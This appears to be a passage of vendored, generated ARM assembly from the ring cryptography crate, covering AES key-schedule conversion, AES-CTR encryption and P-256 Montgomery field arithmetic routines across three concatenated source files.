@ rot_byte(x, 4))
@ table = [0, 0]
@ for i in range(16):
@ table[0] |= (skew(opt(i)) ^ 0x63) << (i*8)
@ table[1] |= skew(opt(i<<4)) << (i*8)
@ print(" .quad 0x%016x, 0x%016x" % u128_to_u64s(table[0]))
@ print(" .quad 0x%016x, 0x%016x" % u128_to_u64s(table[1]))
.Lk_opt_then_skew:
.quad 0x9cb8436798bc4763, 0x6440bb9f6044bf9b
.quad 0x1f30062936192f00, 0xb49bad829db284ab
@ void vpaes_encrypt_key_to_bsaes(AES_KEY *bsaes, const AES_KEY *vpaes);
.globl vpaes_encrypt_key_to_bsaes
.hidden vpaes_encrypt_key_to_bsaes
.type vpaes_encrypt_key_to_bsaes,%function
.align 4
vpaes_encrypt_key_to_bsaes:
stmdb sp!, {r11, lr}
@ See _vpaes_schedule_core for the key schedule logic. In particular,
@ _vpaes_schedule_transform(.Lk_ipt) (section 2.2 of the paper),
@ _vpaes_schedule_mangle (section 4.3), and .Lschedule_mangle_last
@ contain the transformations not in the bsaes representation. This
@ function inverts those transforms.
@
@ Note also that bsaes-armv7.pl expects aes-armv4.pl's key
@ representation, which does not match the other aes_nohw_*
@ implementations. The ARM aes_nohw_* stores each 32-bit word
@ byteswapped, as a convenience for (unsupported) big-endian ARM, at the
@ cost of extra REV and VREV32 operations in little-endian ARM.
vmov.i8 q9, #0x0f @ Required by _vpaes_schedule_transform
adr r2, .Lk_mc_forward @ Must be aligned to 8 mod 16.
add r3, r2, 0x90 @ .Lk_sr+0x10-.Lk_mc_forward = 0x90 (Apple's toolchain doesn't support the expression)
vld1.64 {q12}, [r2]
vmov.i8 q10, #0x5b @ .Lk_s63 from vpaes-x86_64
adr r11, .Lk_opt @ Must be aligned to 8 mod 16.
vmov.i8 q11, #0x63 @ .LK_s63 without .Lk_ipt applied
@ vpaes stores one fewer round count than bsaes, but the number of keys
@ is the same.
ldr r2, [r1,#240]
add r2, r2, #1
str r2, [r0,#240]
@ The first key is transformed with _vpaes_schedule_transform(.Lk_ipt).
@ Invert this with .Lk_opt.
vld1.64 {q0}, [r1]!
bl _vpaes_schedule_transform
vrev32.8 q0, q0
vst1.64 {q0}, [r0]!
@ The middle keys have _vpaes_schedule_transform(.Lk_ipt) applied,
@ followed by _vpaes_schedule_mangle. _vpaes_schedule_mangle XORs 0x63,
@ multiplies by the circulant 0,1,1,1, then applies ShiftRows.
.Loop_enc_key_to_bsaes:
vld1.64 {q0}, [r1]!
@ Invert the ShiftRows step (see .Lschedule_mangle_both). Note we cycle
@ r3 in the opposite direction and start at .Lk_sr+0x10 instead of 0x30.
@ We use r3 rather than r8 to avoid a callee-saved register.
vld1.64 {q1}, [r3]
vtbl.8 d4, {q0}, d2
vtbl.8 d5, {q0}, d3
add r3, r3, #16
and r3, r3, #~(1<<6)
vmov q0, q2
@ Handle the last key differently.
subs r2, r2, #1
beq .Loop_enc_key_to_bsaes_last
@ Multiply by the circulant. This is its own inverse.
vtbl.8 d2, {q0}, d24
vtbl.8 d3, {q0}, d25
vmov q0, q1
vtbl.8 d4, {q1}, d24
vtbl.8 d5, {q1}, d25
veor q0, q0, q2
vtbl.8 d2, {q2}, d24
vtbl.8 d3, {q2}, d25
veor q0, q0, q1
@ XOR and finish.
veor q0, q0, q10
bl _vpaes_schedule_transform
vrev32.8 q0, q0
vst1.64 {q0}, [r0]!
b .Loop_enc_key_to_bsaes
.Loop_enc_key_to_bsaes_last:
@ The final key does not have a basis transform (note
@ .Lschedule_mangle_last inverts the original transform). It only XORs
@ 0x63 and applies ShiftRows. The latter was already inverted in the
@ loop. Note that, because we act on the original representation, we use
@ q11, not q10.
veor q0, q0, q11
vrev32.8 q0, q0
vst1.64 {q0}, [r0]
@ Wipe registers which contained key material.
veor q0, q0, q0
veor q1, q1, q1
veor q2, q2, q2
ldmia sp!, {r11, pc} @ return
.size vpaes_encrypt_key_to_bsaes,.-vpaes_encrypt_key_to_bsaes
.globl vpaes_ctr32_encrypt_blocks
.hidden vpaes_ctr32_encrypt_blocks
.type vpaes_ctr32_encrypt_blocks,%function
.align 4
vpaes_ctr32_encrypt_blocks:
mov ip, sp
stmdb sp!, {r7,r8,r9,r10,r11, lr}
@ This function uses q4-q7 (d8-d15), which are callee-saved.
vstmdb sp!, {d8,d9,d10,d11,d12,d13,d14,d15}
cmp r2, #0
@ r8 is passed on the stack.
ldr r8, [ip]
beq .Lctr32_done
@ _vpaes_encrypt_core expects the key in r2, so swap r2 and r3.
mov r9, r3
mov r3, r2
mov r2, r9
@ Load the IV and counter portion.
ldr r7, [r8, #12]
vld1.8 {q7}, [r8]
bl _vpaes_preheat
rev r7, r7 @ The counter is big-endian.
.Lctr32_loop:
vmov q0, q7
vld1.8 {q6}, [r0]! @ .Load input ahead of time
bl _vpaes_encrypt_core
veor q0, q0, q6 @ XOR input and result
vst1.8 {q0}, [r1]!
subs r3, r3, #1
@ Update the counter.
add r7, r7, #1
rev r9, r7
vmov.32 d15[1], r9
bne .Lctr32_loop
.Lctr32_done:
vldmia sp!, {d8,d9,d10,d11,d12,d13,d14,d15}
ldmia sp!, {r7,r8,r9,r10,r11, pc} @ return
.size vpaes_ctr32_encrypt_blocks,.-vpaes_ctr32_encrypt_blocks
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_ARM) && defined(__ELF__)
|
mi2bjss/Pressel-site | 7,650 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/aesv8-armx-ios64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__APPLE__)
#if __ARM_MAX_ARCH__>=7
.text
.section __TEXT,__const
.align 5
Lrcon:
.long 0x01,0x01,0x01,0x01
.long 0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d // rotate-n-splat
.long 0x1b,0x1b,0x1b,0x1b
.text
.globl _aes_hw_set_encrypt_key
.private_extern _aes_hw_set_encrypt_key
.align 5
_aes_hw_set_encrypt_key:
Lenc_key:
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
mov x3,#-2
cmp w1,#128
b.lt Lenc_key_abort
cmp w1,#256
b.gt Lenc_key_abort
tst w1,#0x3f
b.ne Lenc_key_abort
adrp x3,Lrcon@PAGE
add x3,x3,Lrcon@PAGEOFF
cmp w1,#192
eor v0.16b,v0.16b,v0.16b
ld1 {v3.16b},[x0],#16
mov w1,#8 // reuse w1
ld1 {v1.4s,v2.4s},[x3],#32
b.lt Loop128
// 192-bit key support was removed.
b L256
.align 4
Loop128:
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
subs w1,w1,#1
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
b.ne Loop128
ld1 {v1.4s},[x3]
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
eor v3.16b,v3.16b,v6.16b
st1 {v3.4s},[x2]
add x2,x2,#0x50
mov w12,#10
b Ldone
// 192-bit key support was removed.
.align 4
L256:
ld1 {v4.16b},[x0]
mov w1,#7
mov w12,#14
st1 {v3.4s},[x2],#16
Loop256:
tbl v6.16b,{v4.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v4.4s},[x2],#16
aese v6.16b,v0.16b
subs w1,w1,#1
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
st1 {v3.4s},[x2],#16
b.eq Ldone
dup v6.4s,v3.s[3] // just splat
ext v5.16b,v0.16b,v4.16b,#12
aese v6.16b,v0.16b
eor v4.16b,v4.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v4.16b,v4.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v4.16b,v4.16b,v5.16b
eor v4.16b,v4.16b,v6.16b
b Loop256
Ldone:
str w12,[x2]
mov x3,#0
Lenc_key_abort:
mov x0,x3 // return value
ldr x29,[sp],#16
ret
.globl _aes_hw_ctr32_encrypt_blocks
.private_extern _aes_hw_ctr32_encrypt_blocks
.align 5
_aes_hw_ctr32_encrypt_blocks:
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
ldr w5,[x3,#240]
ldr w8, [x4, #12]
ld1 {v0.4s},[x4]
ld1 {v16.4s,v17.4s},[x3] // load key schedule...
sub w5,w5,#4
mov x12,#16
cmp x2,#2
add x7,x3,x5,lsl#4 // pointer to last 5 round keys
sub w5,w5,#2
ld1 {v20.4s,v21.4s},[x7],#32
ld1 {v22.4s,v23.4s},[x7],#32
ld1 {v7.4s},[x7]
add x7,x3,#32
mov w6,w5
csel x12,xzr,x12,lo
// ARM Cortex-A57 and Cortex-A72 cores running in 32-bit mode are
// affected by silicon errata #1742098 [0] and #1655431 [1],
// respectively, where the second instruction of an aese/aesmc
// instruction pair may execute twice if an interrupt is taken right
// after the first instruction consumes an input register of which a
// single 32-bit lane has been updated the last time it was modified.
//
// This function uses a counter in one 32-bit lane. The vmov lines
// could write to v1.16b and v18.16b directly, but that trips this bugs.
// We write to v6.16b and copy to the final register as a workaround.
//
// [0] ARM-EPM-049219 v23 Cortex-A57 MPCore Software Developers Errata Notice
// [1] ARM-EPM-012079 v11.0 Cortex-A72 MPCore Software Developers Errata Notice
#ifndef __AARCH64EB__
rev w8, w8
#endif
add w10, w8, #1
orr v6.16b,v0.16b,v0.16b
rev w10, w10
mov v6.s[3],w10
add w8, w8, #2
orr v1.16b,v6.16b,v6.16b
b.ls Lctr32_tail
rev w12, w8
mov v6.s[3],w12
sub x2,x2,#3 // bias
orr v18.16b,v6.16b,v6.16b
b Loop3x_ctr32
.align 4
Loop3x_ctr32:
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
aese v18.16b,v16.16b
aesmc v18.16b,v18.16b
ld1 {v16.4s},[x7],#16
subs w6,w6,#2
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
aese v18.16b,v17.16b
aesmc v18.16b,v18.16b
ld1 {v17.4s},[x7],#16
b.gt Loop3x_ctr32
aese v0.16b,v16.16b
aesmc v4.16b,v0.16b
aese v1.16b,v16.16b
aesmc v5.16b,v1.16b
ld1 {v2.16b},[x0],#16
add w9,w8,#1
aese v18.16b,v16.16b
aesmc v18.16b,v18.16b
ld1 {v3.16b},[x0],#16
rev w9,w9
aese v4.16b,v17.16b
aesmc v4.16b,v4.16b
aese v5.16b,v17.16b
aesmc v5.16b,v5.16b
ld1 {v19.16b},[x0],#16
mov x7,x3
aese v18.16b,v17.16b
aesmc v17.16b,v18.16b
aese v4.16b,v20.16b
aesmc v4.16b,v4.16b
aese v5.16b,v20.16b
aesmc v5.16b,v5.16b
eor v2.16b,v2.16b,v7.16b
add w10,w8,#2
aese v17.16b,v20.16b
aesmc v17.16b,v17.16b
eor v3.16b,v3.16b,v7.16b
add w8,w8,#3
aese v4.16b,v21.16b
aesmc v4.16b,v4.16b
aese v5.16b,v21.16b
aesmc v5.16b,v5.16b
// Note the logic to update v0.16b, v1.16b, and v1.16b is written to work
// around a bug in ARM Cortex-A57 and Cortex-A72 cores running in
// 32-bit mode. See the comment above.
eor v19.16b,v19.16b,v7.16b
mov v6.s[3], w9
aese v17.16b,v21.16b
aesmc v17.16b,v17.16b
orr v0.16b,v6.16b,v6.16b
rev w10,w10
aese v4.16b,v22.16b
aesmc v4.16b,v4.16b
mov v6.s[3], w10
rev w12,w8
aese v5.16b,v22.16b
aesmc v5.16b,v5.16b
orr v1.16b,v6.16b,v6.16b
mov v6.s[3], w12
aese v17.16b,v22.16b
aesmc v17.16b,v17.16b
orr v18.16b,v6.16b,v6.16b
subs x2,x2,#3
aese v4.16b,v23.16b
aese v5.16b,v23.16b
aese v17.16b,v23.16b
eor v2.16b,v2.16b,v4.16b
ld1 {v16.4s},[x7],#16 // re-pre-load rndkey[0]
st1 {v2.16b},[x1],#16
eor v3.16b,v3.16b,v5.16b
mov w6,w5
st1 {v3.16b},[x1],#16
eor v19.16b,v19.16b,v17.16b
ld1 {v17.4s},[x7],#16 // re-pre-load rndkey[1]
st1 {v19.16b},[x1],#16
b.hs Loop3x_ctr32
adds x2,x2,#3
b.eq Lctr32_done
cmp x2,#1
mov x12,#16
csel x12,xzr,x12,eq
Lctr32_tail:
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
ld1 {v16.4s},[x7],#16
subs w6,w6,#2
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
ld1 {v17.4s},[x7],#16
b.gt Lctr32_tail
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
ld1 {v2.16b},[x0],x12
aese v0.16b,v20.16b
aesmc v0.16b,v0.16b
aese v1.16b,v20.16b
aesmc v1.16b,v1.16b
ld1 {v3.16b},[x0]
aese v0.16b,v21.16b
aesmc v0.16b,v0.16b
aese v1.16b,v21.16b
aesmc v1.16b,v1.16b
eor v2.16b,v2.16b,v7.16b
aese v0.16b,v22.16b
aesmc v0.16b,v0.16b
aese v1.16b,v22.16b
aesmc v1.16b,v1.16b
eor v3.16b,v3.16b,v7.16b
aese v0.16b,v23.16b
aese v1.16b,v23.16b
cmp x2,#1
eor v2.16b,v2.16b,v0.16b
eor v3.16b,v3.16b,v1.16b
st1 {v2.16b},[x1],#16
b.eq Lctr32_done
st1 {v3.16b},[x1]
Lctr32_done:
ldr x29,[sp],#16
ret
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__APPLE__)
|
mi2bjss/Pressel-site | 36,746 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/p256-armv8-asm-linux64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__ELF__)
.section .rodata
.align 5
.Lpoly:
.quad 0xffffffffffffffff,0x00000000ffffffff,0x0000000000000000,0xffffffff00000001
.LRR: // 2^512 mod P precomputed for NIST P256 polynomial
.quad 0x0000000000000003,0xfffffffbffffffff,0xfffffffffffffffe,0x00000004fffffffd
.Lone_mont:
.quad 0x0000000000000001,0xffffffff00000000,0xffffffffffffffff,0x00000000fffffffe
.Lone:
.quad 1,0,0,0
.Lord:
.quad 0xf3b9cac2fc632551,0xbce6faada7179e84,0xffffffffffffffff,0xffffffff00000000
.LordK:
.quad 0xccd1c8aaee00bc4f
.byte 69,67,80,95,78,73,83,84,90,50,53,54,32,102,111,114,32,65,82,77,118,56,44,32,67,82,89,80,84,79,71,65,77,83,32,98,121,32,60,97,112,112,114,111,64,111,112,101,110,115,115,108,46,111,114,103,62,0
.align 2
.text
// void ecp_nistz256_mul_mont(BN_ULONG x0[4],const BN_ULONG x1[4],
// const BN_ULONG x2[4]);
.globl ecp_nistz256_mul_mont
.hidden ecp_nistz256_mul_mont
.type ecp_nistz256_mul_mont,%function
.align 4
ecp_nistz256_mul_mont:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-32]!
add x29,sp,#0
stp x19,x20,[sp,#16]
ldr x3,[x2] // bp[0]
ldp x4,x5,[x1]
ldp x6,x7,[x1,#16]
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
ldr x13,[x13,#24]
bl __ecp_nistz256_mul_mont
ldp x19,x20,[sp,#16]
ldp x29,x30,[sp],#32
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_mul_mont,.-ecp_nistz256_mul_mont
// void ecp_nistz256_sqr_mont(BN_ULONG x0[4],const BN_ULONG x1[4]);
.globl ecp_nistz256_sqr_mont
.hidden ecp_nistz256_sqr_mont
.type ecp_nistz256_sqr_mont,%function
.align 4
ecp_nistz256_sqr_mont:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-32]!
add x29,sp,#0
stp x19,x20,[sp,#16]
ldp x4,x5,[x1]
ldp x6,x7,[x1,#16]
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
ldr x13,[x13,#24]
bl __ecp_nistz256_sqr_mont
ldp x19,x20,[sp,#16]
ldp x29,x30,[sp],#32
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_sqr_mont,.-ecp_nistz256_sqr_mont
// void ecp_nistz256_neg(BN_ULONG x0[4],const BN_ULONG x1[4]);
.globl ecp_nistz256_neg
.hidden ecp_nistz256_neg
.type ecp_nistz256_neg,%function
.align 4
ecp_nistz256_neg:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-16]!
add x29,sp,#0
mov x2,x1
mov x14,xzr // a = 0
mov x15,xzr
mov x16,xzr
mov x17,xzr
adrp x13,.Lpoly
add x13,x13,:lo12:.Lpoly
ldr x12,[x13,#8]
ldr x13,[x13,#24]
bl __ecp_nistz256_sub_from
ldp x29,x30,[sp],#16
AARCH64_VALIDATE_LINK_REGISTER
ret
.size ecp_nistz256_neg,.-ecp_nistz256_neg
// note that __ecp_nistz256_mul_mont expects a[0-3] input pre-loaded
// to x4-x7 and b[0] - to x3
.type __ecp_nistz256_mul_mont,%function
.align 4
__ecp_nistz256_mul_mont:
mul x14,x4,x3 // a[0]*b[0]
umulh x8,x4,x3
mul x15,x5,x3 // a[1]*b[0]
umulh x9,x5,x3
mul x16,x6,x3 // a[2]*b[0]
umulh x10,x6,x3
mul x17,x7,x3 // a[3]*b[0]
umulh x11,x7,x3
ldr x3,[x2,#8] // b[1]
adds x15,x15,x8 // accumulate high parts of multiplication
lsl x8,x14,#32
adcs x16,x16,x9
lsr x9,x14,#32
adcs x17,x17,x10
adc x19,xzr,x11
mov x20,xzr
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
mul x8,x4,x3 // lo(a[0]*b[i])
adcs x15,x16,x9
mul x9,x5,x3 // lo(a[1]*b[i])
adcs x16,x17,x10 // +=acc[0]*0xffff0001
mul x10,x6,x3 // lo(a[2]*b[i])
adcs x17,x19,x11
mul x11,x7,x3 // lo(a[3]*b[i])
adc x19,x20,xzr
adds x14,x14,x8 // accumulate low parts of multiplication
umulh x8,x4,x3 // hi(a[0]*b[i])
adcs x15,x15,x9
umulh x9,x5,x3 // hi(a[1]*b[i])
adcs x16,x16,x10
umulh x10,x6,x3 // hi(a[2]*b[i])
adcs x17,x17,x11
umulh x11,x7,x3 // hi(a[3]*b[i])
adc x19,x19,xzr
ldr x3,[x2,#8*(1+1)] // b[1+1]
adds x15,x15,x8 // accumulate high parts of multiplication
lsl x8,x14,#32
adcs x16,x16,x9
lsr x9,x14,#32
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
mul x8,x4,x3 // lo(a[0]*b[i])
adcs x15,x16,x9
mul x9,x5,x3 // lo(a[1]*b[i])
adcs x16,x17,x10 // +=acc[0]*0xffff0001
mul x10,x6,x3 // lo(a[2]*b[i])
adcs x17,x19,x11
mul x11,x7,x3 // lo(a[3]*b[i])
adc x19,x20,xzr
adds x14,x14,x8 // accumulate low parts of multiplication
umulh x8,x4,x3 // hi(a[0]*b[i])
adcs x15,x15,x9
umulh x9,x5,x3 // hi(a[1]*b[i])
adcs x16,x16,x10
umulh x10,x6,x3 // hi(a[2]*b[i])
adcs x17,x17,x11
umulh x11,x7,x3 // hi(a[3]*b[i])
adc x19,x19,xzr
ldr x3,[x2,#8*(2+1)] // b[2+1]
adds x15,x15,x8 // accumulate high parts of multiplication
lsl x8,x14,#32
adcs x16,x16,x9
lsr x9,x14,#32
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
mul x8,x4,x3 // lo(a[0]*b[i])
adcs x15,x16,x9
mul x9,x5,x3 // lo(a[1]*b[i])
adcs x16,x17,x10 // +=acc[0]*0xffff0001
mul x10,x6,x3 // lo(a[2]*b[i])
adcs x17,x19,x11
mul x11,x7,x3 // lo(a[3]*b[i])
adc x19,x20,xzr
adds x14,x14,x8 // accumulate low parts of multiplication
umulh x8,x4,x3 // hi(a[0]*b[i])
adcs x15,x15,x9
umulh x9,x5,x3 // hi(a[1]*b[i])
adcs x16,x16,x10
umulh x10,x6,x3 // hi(a[2]*b[i])
adcs x17,x17,x11
umulh x11,x7,x3 // hi(a[3]*b[i])
adc x19,x19,xzr
adds x15,x15,x8 // accumulate high parts of multiplication
lsl x8,x14,#32
adcs x16,x16,x9
lsr x9,x14,#32
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
// last reduction
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
adcs x15,x16,x9
adcs x16,x17,x10 // +=acc[0]*0xffff0001
adcs x17,x19,x11
adc x19,x20,xzr
adds x8,x14,#1 // subs x8,x14,#-1 // tmp = ret-modulus
sbcs x9,x15,x12
sbcs x10,x16,xzr
sbcs x11,x17,x13
sbcs xzr,x19,xzr // did it borrow?
csel x14,x14,x8,lo // ret = borrow ? ret : ret-modulus
csel x15,x15,x9,lo
csel x16,x16,x10,lo
stp x14,x15,[x0]
csel x17,x17,x11,lo
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_mul_mont,.-__ecp_nistz256_mul_mont
// note that __ecp_nistz256_sqr_mont expects a[0-3] input pre-loaded
// to x4-x7
.type __ecp_nistz256_sqr_mont,%function
.align 4
__ecp_nistz256_sqr_mont:
// | | | | | |a1*a0| |
// | | | | |a2*a0| | |
// | |a3*a2|a3*a0| | | |
// | | | |a2*a1| | | |
// | | |a3*a1| | | | |
// *| | | | | | | | 2|
// +|a3*a3|a2*a2|a1*a1|a0*a0|
// |--+--+--+--+--+--+--+--|
// |A7|A6|A5|A4|A3|A2|A1|A0|, where Ax is , i.e. follow
//
// "can't overflow" below mark carrying into high part of
// multiplication result, which can't overflow, because it
// can never be all ones.
mul x15,x5,x4 // a[1]*a[0]
umulh x9,x5,x4
mul x16,x6,x4 // a[2]*a[0]
umulh x10,x6,x4
mul x17,x7,x4 // a[3]*a[0]
umulh x19,x7,x4
adds x16,x16,x9 // accumulate high parts of multiplication
mul x8,x6,x5 // a[2]*a[1]
umulh x9,x6,x5
adcs x17,x17,x10
mul x10,x7,x5 // a[3]*a[1]
umulh x11,x7,x5
adc x19,x19,xzr // can't overflow
mul x20,x7,x6 // a[3]*a[2]
umulh x1,x7,x6
adds x9,x9,x10 // accumulate high parts of multiplication
mul x14,x4,x4 // a[0]*a[0]
adc x10,x11,xzr // can't overflow
adds x17,x17,x8 // accumulate low parts of multiplication
umulh x4,x4,x4
adcs x19,x19,x9
mul x9,x5,x5 // a[1]*a[1]
adcs x20,x20,x10
umulh x5,x5,x5
adc x1,x1,xzr // can't overflow
adds x15,x15,x15 // acc[1-6]*=2
mul x10,x6,x6 // a[2]*a[2]
adcs x16,x16,x16
umulh x6,x6,x6
adcs x17,x17,x17
mul x11,x7,x7 // a[3]*a[3]
adcs x19,x19,x19
umulh x7,x7,x7
adcs x20,x20,x20
adcs x1,x1,x1
adc x2,xzr,xzr
adds x15,x15,x4 // +a[i]*a[i]
adcs x16,x16,x9
adcs x17,x17,x5
adcs x19,x19,x10
adcs x20,x20,x6
lsl x8,x14,#32
adcs x1,x1,x11
lsr x9,x14,#32
adc x2,x2,x7
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
adcs x15,x16,x9
lsl x8,x14,#32
adcs x16,x17,x10 // +=acc[0]*0xffff0001
lsr x9,x14,#32
adc x17,x11,xzr // can't overflow
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
adcs x15,x16,x9
lsl x8,x14,#32
adcs x16,x17,x10 // +=acc[0]*0xffff0001
lsr x9,x14,#32
adc x17,x11,xzr // can't overflow
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
adcs x15,x16,x9
lsl x8,x14,#32
adcs x16,x17,x10 // +=acc[0]*0xffff0001
lsr x9,x14,#32
adc x17,x11,xzr // can't overflow
subs x10,x14,x8 // "*0xffff0001"
sbc x11,x14,x9
adds x14,x15,x8 // +=acc[0]<<96 and omit acc[0]
adcs x15,x16,x9
adcs x16,x17,x10 // +=acc[0]*0xffff0001
adc x17,x11,xzr // can't overflow
adds x14,x14,x19 // accumulate upper half
adcs x15,x15,x20
adcs x16,x16,x1
adcs x17,x17,x2
adc x19,xzr,xzr
adds x8,x14,#1 // subs x8,x14,#-1 // tmp = ret-modulus
sbcs x9,x15,x12
sbcs x10,x16,xzr
sbcs x11,x17,x13
sbcs xzr,x19,xzr // did it borrow?
csel x14,x14,x8,lo // ret = borrow ? ret : ret-modulus
csel x15,x15,x9,lo
csel x16,x16,x10,lo
stp x14,x15,[x0]
csel x17,x17,x11,lo
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_sqr_mont,.-__ecp_nistz256_sqr_mont
// Note that __ecp_nistz256_add_to expects both input vectors pre-loaded to
// x4-x7 and x8-x11. This is done because it's used in multiple
// contexts, e.g. in multiplication by 2 and 3...
.type __ecp_nistz256_add_to,%function
.align 4
__ecp_nistz256_add_to:
adds x14,x14,x8 // ret = a+b
adcs x15,x15,x9
adcs x16,x16,x10
adcs x17,x17,x11
adc x1,xzr,xzr // zap x1
adds x8,x14,#1 // subs x8,x4,#-1 // tmp = ret-modulus
sbcs x9,x15,x12
sbcs x10,x16,xzr
sbcs x11,x17,x13
sbcs xzr,x1,xzr // did subtraction borrow?
csel x14,x14,x8,lo // ret = borrow ? ret : ret-modulus
csel x15,x15,x9,lo
csel x16,x16,x10,lo
stp x14,x15,[x0]
csel x17,x17,x11,lo
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_add_to,.-__ecp_nistz256_add_to
.type __ecp_nistz256_sub_from,%function
.align 4
__ecp_nistz256_sub_from:
ldp x8,x9,[x2]
ldp x10,x11,[x2,#16]
subs x14,x14,x8 // ret = a-b
sbcs x15,x15,x9
sbcs x16,x16,x10
sbcs x17,x17,x11
sbc x1,xzr,xzr // zap x1
subs x8,x14,#1 // adds x8,x4,#-1 // tmp = ret+modulus
adcs x9,x15,x12
adcs x10,x16,xzr
adc x11,x17,x13
cmp x1,xzr // did subtraction borrow?
csel x14,x14,x8,eq // ret = borrow ? ret+modulus : ret
csel x15,x15,x9,eq
csel x16,x16,x10,eq
stp x14,x15,[x0]
csel x17,x17,x11,eq
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_sub_from,.-__ecp_nistz256_sub_from
.type __ecp_nistz256_sub_morf,%function
.align 4
__ecp_nistz256_sub_morf:
ldp x8,x9,[x2]
ldp x10,x11,[x2,#16]
subs x14,x8,x14 // ret = b-a
sbcs x15,x9,x15
sbcs x16,x10,x16
sbcs x17,x11,x17
sbc x1,xzr,xzr // zap x1
subs x8,x14,#1 // adds x8,x4,#-1 // tmp = ret+modulus
adcs x9,x15,x12
adcs x10,x16,xzr
adc x11,x17,x13
cmp x1,xzr // did subtraction borrow?
csel x14,x14,x8,eq // ret = borrow ? ret+modulus : ret
csel x15,x15,x9,eq
csel x16,x16,x10,eq
stp x14,x15,[x0]
csel x17,x17,x11,eq
stp x16,x17,[x0,#16]
ret
.size __ecp_nistz256_sub_morf,.-__ecp_nistz256_sub_morf
